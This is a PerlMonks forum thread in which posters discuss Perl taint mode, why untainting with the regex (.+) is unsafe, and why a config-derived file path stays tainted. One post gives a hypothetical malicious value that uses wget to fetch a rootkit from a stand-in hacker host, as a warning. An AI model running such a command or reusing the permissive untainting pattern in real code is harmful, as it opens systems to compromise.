Beefy Boxes and Bandwidth Generously Provided by pair Networks
laziness, impatience, and hubris
 
PerlMonks  

Re: proper untainting and use of ref

by tachyon (Chancellor)
on Apr 17, 2002 at 18:24 UTC ( #159924=note: print w/replies, xml ) Need Help??


in reply to proper untainting and use of ref

Here is how taint mode works. Any input from outside your code is flagged as tainted until you untaint it. You may not use a tainted value to do things external to your script like say open You get the value for $userfile from your config file (external) via the tainted $config and then try to open it via open ( USER, '>', $userfile ) without untainting it. You need to untaint this value. untainting with (.+) is bad as it lets anything through. What if

$userfile = 'wget http://hacker.com/rfp/rootkit.tar.gz > /bin/badfile_to_have_here'

You would also be wise to set a $filepath and concatenate the value for $userfile to it. This is to make it harder to hack and easier to untaint $userfile. Regardless you must protect your config file (not world readable) and untaint values you use for operations external to your script. Taint will let you know if you have forgotten. Cool huh?

cheers

tachyon

s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print

Replies are listed 'Best First'.
Re: Re: proper untainting and use of ref
by particle (Vicar) on Apr 17, 2002 at 18:39 UTC
    my problem is i've already untainted this data once.
    # ...snip... # untaint parameters for( keys %params ) { # !!!TODO!!! check 'ref' line for subtle bugs ( display_message( $messages{error} ) && exit ) unless ref($valid_params{$_}) eq 'Regexp'; if( $params{$_} =~ /$valid_params{$_}/ ) { $params{$_} = $1; } else { display_message( $messages{error} ) && exit; } }
    so the data in %params should be untainted, no? but when it's accessed later, via

    my $userfile = get_userfile( $config, $params{username} );
    $userfile is now tainted, even though $params{username} should be untainted. am i missing something?

    Update: modifying the get_userfile() sub like so:

    sub get_userfile { my ( $config, $username ) = ( shift, shift ); # add only this line: still tainted # ( $config->{ users } ) = ( $config->{ users } =~ /^(.+)$/ ); # add only this line: untainted # ( $username ) = ( $username =~ /^(.+)$/ ); $config->{ users } . $username; }
    so $config and its data are not tainted. why is $params{ username } still tainted?

    ~Particle ;

Log In?
Username:
Password:

What's my password?
Create A New User
Node Status?
node history
Node Type: note [id://159924]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others romping around the Monastery: (6)
As of 2020-04-05 02:00 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?
    The most amusing oxymoron is:
















    Results (33 votes). Check out past polls.

    Notices?